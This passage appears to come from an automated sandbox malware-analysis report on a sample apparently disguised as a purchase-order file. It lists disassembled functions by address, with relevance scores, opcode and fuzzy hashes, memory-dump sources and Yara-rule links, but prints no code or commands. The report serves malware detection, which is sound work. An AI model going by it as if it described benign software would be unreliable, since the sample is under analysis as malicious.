Opcode Fuzzy Hash: 8c8ce1746e7587de575d984ff40589d4e70563b8eac337f2deb8a199f6ea643f
Instruction Fuzzy Hash: 2C61BC71600616AFD715DF68C884BEFBBA9FB98B54F00861EF99887240DB30A914CF95

Function 010CCA13 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6af28b7275021a51ea9f59cb730d3d1a2e37bdce4d549c253e708a3f17be3e34
Instruction ID: 0915d80c23222fb68c683410235cec768cd525155f078c29e78e996e9271d40f
Opcode Fuzzy Hash: 6af28b7275021a51ea9f59cb730d3d1a2e37bdce4d549c253e708a3f17be3e34
Instruction Fuzzy Hash: A65188326046024BE755DF2CC9507BFBBE2AFD0A54F1984ADE8D9C7242DA30D9098FE1

Function 0102ECF3 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb336259155a600105c4c5f32c527effabef3c476ffd52645cfa7d7d601664c
Instruction ID: 24a26d5b7e0c25c3d99a386c45b7cc13bf2246b9377fa36fbf46fe15a68635c7
Opcode Fuzzy Hash: cdb336259155a600105c4c5f32c527effabef3c476ffd52645cfa7d7d601664c
Instruction Fuzzy Hash: 3751BC712407169FDB31EB5DC884AAAB7F9FB55319F10486ED1C287A51CBB8E884CB40

Function 00C30313 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 018a6878f87e833d73e3e4c97fc7bcf75670b7e648d0f7f262e48a0ccabd2b39
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: 465170B3E14A214BD3188E09CC50631B792FFD8312B5F81BADD199B357CA74E9529A90

Function 0102CD10 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
Instruction ID: 46c255216ef1286bd866a3dee437f8a0d40af7de511df2b7e4958f72135f7de9
Opcode Fuzzy Hash: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
Instruction Fuzzy Hash: E651507AE0035ADBDF14DFACC5806EEBBF9FF48210F198169D995B7204D634AA41CB90

Function 010C892E Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5e9a6f8f89c3f19fab2bed31c34e622c64eee02eb8c04aca2aafb55d22160b1
Instruction ID: 1e1a966c25f1a1464c1df585c4904cd23e94817a3fafa05819774eee2ff028ad
Opcode Fuzzy Hash: d5e9a6f8f89c3f19fab2bed31c34e622c64eee02eb8c04aca2aafb55d22160b1
Instruction Fuzzy Hash: FD51BE716047029BE715CF68C840BAEB7E5EF84B50F04892EF9D597290D734E909CF9A

Function 0103E363 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cab57590088b342f99f727068678bd77f3c3bb0afc9450d42f96e293d86f196
Instruction ID: 6de37a81ad61ec202ec2dfb5656a1c0537d95351b873efd363f40bea8a30ead3
Opcode Fuzzy Hash: 1cab57590088b342f99f727068678bd77f3c3bb0afc9450d42f96e293d86f196
Instruction Fuzzy Hash: 5E518A71600A05DFCB22EF68C9D0EAAB3FDFF48754F00456AE69697260DB34E941CB60

Function 0102AD20 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa7b5c73542af51f878e5a8304ab281d0fc80105660688ef2567bc9ac9d0b6a4
Instruction ID: ac3742cda0b14e37f4eaef5bd343a72b0adb98f45209a9d81b23d08484ae61a4
Opcode Fuzzy Hash: fa7b5c73542af51f878e5a8304ab281d0fc80105660688ef2567bc9ac9d0b6a4
Instruction Fuzzy Hash: 1751F132700651DFDF279F18C840BAA77BAFB44B64F1544A8EA819BA91DA34CD02CB80

Function 00EB04CE Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 473041a4dc8f5f34a2554dbdf7e5eaa1ed9801004694ab857079086eea35c53e
Instruction ID: 718a81490324f1cb7c1d5ebb02a51b86efa318cbd44f55d94c89e4b3164d5dd0
Opcode Fuzzy Hash: 473041a4dc8f5f34a2554dbdf7e5eaa1ed9801004694ab857079086eea35c53e
Instruction Fuzzy Hash: B641267160DB0D4FD378AF6890826FBB3E2FB45310F10152DD59AD3652EA75E8428A85

Function 010244D1 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
Instruction ID: b825e9f536819d229943ce07e2a79a2810bfa69b35c6236d291ce530455a953f
Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
Instruction Fuzzy Hash: CC51B371E0022AEBDF25DF94C454BEEBBB9AF48714F054069EA80EB240DB74DD45CBA1

Function 010836EC Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a205d67c8fa3435fe8aede8c65fe9ceb0f7a321283a2142d27bb28fdd01443bb
Instruction ID: 202a055703ae4295496ba842e496136d247cd6c38e048eceaaae434242e89e72
Opcode Fuzzy Hash: a205d67c8fa3435fe8aede8c65fe9ceb0f7a321283a2142d27bb28fdd01443bb
Instruction Fuzzy Hash: 53519D72E4420D4BEF25DA58D4A27EFB3F2FB80310F440859FA95BF3C0D665A946D650

Function 0107D480 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3215be9abca5bb5cb58d30893e802e1db211e6d6742cc0a8008b7dedb6d39da9
Instruction ID: 823360a0ca7dd38a13ea7f6b90703593f23339df98a2dce45c0d199d04a50e07
Opcode Fuzzy Hash: 3215be9abca5bb5cb58d30893e802e1db211e6d6742cc0a8008b7dedb6d39da9
Instruction Fuzzy Hash: 0251F470A00212EBDB14DF9DC490ABEB7F4FF49704B4441AAE9C5DB680EB35E950CB95

Function 0108E660 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
Instruction ID: 99a99f3fae687f52412d376f29c4bb1a627902ca88739913db4e76ddd46481d2
Opcode Fuzzy Hash: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
Instruction Fuzzy Hash: AC51A571A0421AEBEF21BF94CC84BAEBBB9BF00724F114665EAD167290D7719E418790

Function 010CCDEB Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 173bb9dbbcd0be3f8c9d4c742029edf805d490d77a1cbf823aad8373047dcb15
Instruction ID: 21bcbfc92e5a6fbd9251c32d8a36e9d322f394be50f89af3bfa87c02702b2cf8
Opcode Fuzzy Hash: 173bb9dbbcd0be3f8c9d4c742029edf805d490d77a1cbf823aad8373047dcb15
Instruction Fuzzy Hash: 1A514C712083429FE710CF68C980B5EBBE5FB89B54F04896DF99997280D734D946CF92

Function 010C86A8 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ac44baa13f2d8c1db28757be86526caa1d0dd5c96d43f05c1a8b483eb5e800
Instruction ID: a0a4e38f130c5b088dbd71337bfdadb034a8c7229cf2e46b6e27f7c10dd713b8
Opcode Fuzzy Hash: 17ac44baa13f2d8c1db28757be86526caa1d0dd5c96d43f05c1a8b483eb5e800
Instruction Fuzzy Hash: 8F41D4307006019BD66A9B2DC894BBFBBDAFF90E60F04C25EE99587690E734D811CE94

Function 01092CD0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a04f90c97406b7eebe2cb28842d499e8ff037ff04dfaf541be110bc48fe7b95
Instruction ID: a43100df3cc127be3bc3266e29db5c0d6e20ca8810a005323a8dae94b2efced9
Opcode Fuzzy Hash: 4a04f90c97406b7eebe2cb28842d499e8ff037ff04dfaf541be110bc48fe7b95
Instruction Fuzzy Hash: 0851BD72604201EFDB21DF18C890BAAB7E4FF89314F05896AF9D49B250D374ED45DB92

Function 00EBE7B3 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f0a6f61664b05344ad4b850c72f1e3a223501de72ff72ae20fecc13943f346b
Instruction ID: c16a7e0f55f412ab14fad5375bd147ec049f8e0fb056019dc258b54103e0ad13
Opcode Fuzzy Hash: 2f0a6f61664b05344ad4b850c72f1e3a223501de72ff72ae20fecc13943f346b
Instruction Fuzzy Hash: 9841BF317287454B974CCA2D94912BB77D6E7CD308F18963EE69BD3381E924D9038786

Function 0108C870 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aea34f066f8e701b034367c6b853cfd5ab7696ccad219281a83c024648c6ff9
Instruction ID: 51843fcc2fbcf4f60520d07d8a857c0c8ac14fa704714b187d185f7bea25b1ce
Opcode Fuzzy Hash: 8aea34f066f8e701b034367c6b853cfd5ab7696ccad219281a83c024648c6ff9
Instruction Fuzzy Hash: E551AF7190421ADFEB20EFA8C9849DEBBF5FB58364B10856AD5C1A3705DB35AD01CFA0

Function 0103CB20 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d146a75f793e29cfd58edaf19e1458b2384b0cceeb33f954b1960051e94367
Instruction ID: 85cc0ac577dd9abff6ca973a3b715d27c2fd05588e73920ecdc5b57f89989e69
Opcode Fuzzy Hash: 75d146a75f793e29cfd58edaf19e1458b2384b0cceeb33f954b1960051e94367
Instruction Fuzzy Hash: C951E530600206CAFB6D8E2DCB4566AB7DDFBC5214F18C4AFEAC6EB142D735D881E651

Function 00C21000 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02df9d03d8da2eb9c299936e9284c73fd1aa73bc261d42b2c1fc599bacadcfd5
Instruction ID: 0b78db199f1d805ac8d090ac1af6a00f16de28246f7052333c21c43fee30925d
Opcode Fuzzy Hash: 02df9d03d8da2eb9c299936e9284c73fd1aa73bc261d42b2c1fc599bacadcfd5
Instruction Fuzzy Hash: 43314CA3B0116613D72C441DECA16B9514BD7F4355F6DD23AEF69CFFC4E826AE114280

Function 00EBE413 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 891faa96f3ad7a9271478a31cb22cbcc91c20f9288f0a95538640f809bb099c0
Instruction ID: b021efec188e83c312284d8572171d668f6b49b4914ca9d107861a0e25e14bdb
Opcode Fuzzy Hash: 891faa96f3ad7a9271478a31cb22cbcc91c20f9288f0a95538640f809bb099c0
Instruction Fuzzy Hash: 0C41D3317286444BD75CCA2C98912AB77D2E7CC309F24963DF69BC3381DA34D9038A86

Function 0103A350 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4d4fbc6babab97890e00b533d6d1605bc01803f9fd857dc2ea129d7370c3a1c
Instruction ID: 26429e97dc89c82b6dfb28ed6bbb22810aa25bcce2d518977f44054b906e0da3
Opcode Fuzzy Hash: c4d4fbc6babab97890e00b533d6d1605bc01803f9fd857dc2ea129d7370c3a1c
Instruction Fuzzy Hash: 77412B75B402029BDB65EF6CD882FAA77A9EBD5708F00406DFAC2DB245DB77D8008790

Function 010CA553 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
Instruction ID: 5c612e8cb668aa6c4b64c655468a23f3ba63877749477e69befa73e8c3cf8725
Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
Instruction Fuzzy Hash: BA41C57170071ADBD725CF28C880AAEB7E9FF94614B04856DE9928B244FB30ED14CB90

Function 01030118 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be4f513a3ff8047f268b17de50a66b9386b03491619458cf43d2b7599659baa
Instruction ID: 70ff9895f9d7f7ecb8a4b57b7724c1db87ee747334be8ae3cff4b2aa8d2bd740
Opcode Fuzzy Hash: 0be4f513a3ff8047f268b17de50a66b9386b03491619458cf43d2b7599659baa
Instruction Fuzzy Hash: AF41F035D02219DBDB10CF98C840AEEF7B8BF89700F1582AAF895E7244D7359D01CBA4

Function 01042670 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
Instruction ID: 59eb43ab8967a5d24b19e94c0ef5860dd22d6dc2b12b9448cb7586f321db5005
Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
Instruction Fuzzy Hash: DA514775E00229CFDB55CF98C480AAEF7F1BF88710F2881A9D955AB351D730AA42CB94

Function 01006074 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22feb44e1acafc20c970436ff6d95b1a1828e7f56646817b07cc4b2ae3abd1a2
Instruction ID: 9c013ba9b8c7932e6a527471e69679e7087e3f36c48c86fdf4b2382b4a9a9b4f
Opcode Fuzzy Hash: 22feb44e1acafc20c970436ff6d95b1a1828e7f56646817b07cc4b2ae3abd1a2
Instruction Fuzzy Hash: C7510870A401069BEB26CB28CC01BF9B7F5FF11314F1882E9E195976D6DB7A9991CF40

Function 01000AED Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa5e0a2c53e6a9028234b1515ccfc092b2deea95ee29b801f56045781f696df8
Instruction ID: 715c165842171e4162f94451ead1755c4b3dfb328deea49e1f79a73bb54786db
Opcode Fuzzy Hash: aa5e0a2c53e6a9028234b1515ccfc092b2deea95ee29b801f56045781f696df8
Instruction Fuzzy Hash: 9641B731A40629DBDB61DF28C980BEFB7B5EF45740F0100E5E989AB285DB34DE41CB90

Function 01000C79 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526d8fcaf80a809af3a3e54736cc66b87462a0612871ddc5386e86c4da881531
Instruction ID: eb152936df81b1069086c121f73eba9a232a1c0c40a094858b84e4935b89a287
Opcode Fuzzy Hash: 526d8fcaf80a809af3a3e54736cc66b87462a0612871ddc5386e86c4da881531
Instruction Fuzzy Hash: 4A41D2716007149FFB62AF24CC80FAEBBE9AB45640F0400AAF9859B2C5D774ED40CB61

Function 010CEC60 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad4afd59f12f0e99125f3324daaa1b7c9c8d54c4933cc7516f1ccf7a44131da
Instruction ID: e7ed8e5e286fbd602c21fd3080ea7a5779719e2fe8a45403ce14165a84b89a39
Opcode Fuzzy Hash: 5ad4afd59f12f0e99125f3324daaa1b7c9c8d54c4933cc7516f1ccf7a44131da
Instruction Fuzzy Hash: 3E419F712143418BD704DF29C8A597BBFE2FB85621F05899EF8DA8B282C734D819DB61

Function 010007A7 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ce56e79cf33cd40d3719130fcd37ac46b4a80fde7340f96df54e7776f9ad97
Instruction ID: 6d26b7c149fbb9a78478d25d2db45288a77e1721f092ec86e0df56e97836136b
Opcode Fuzzy Hash: 47ce56e79cf33cd40d3719130fcd37ac46b4a80fde7340f96df54e7776f9ad97
Instruction Fuzzy Hash: 7B41E2706007029FE326CF28C480A66B7F8FF48354B10896EE5CA87A94EB35F645CB90

Function 010AD130 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
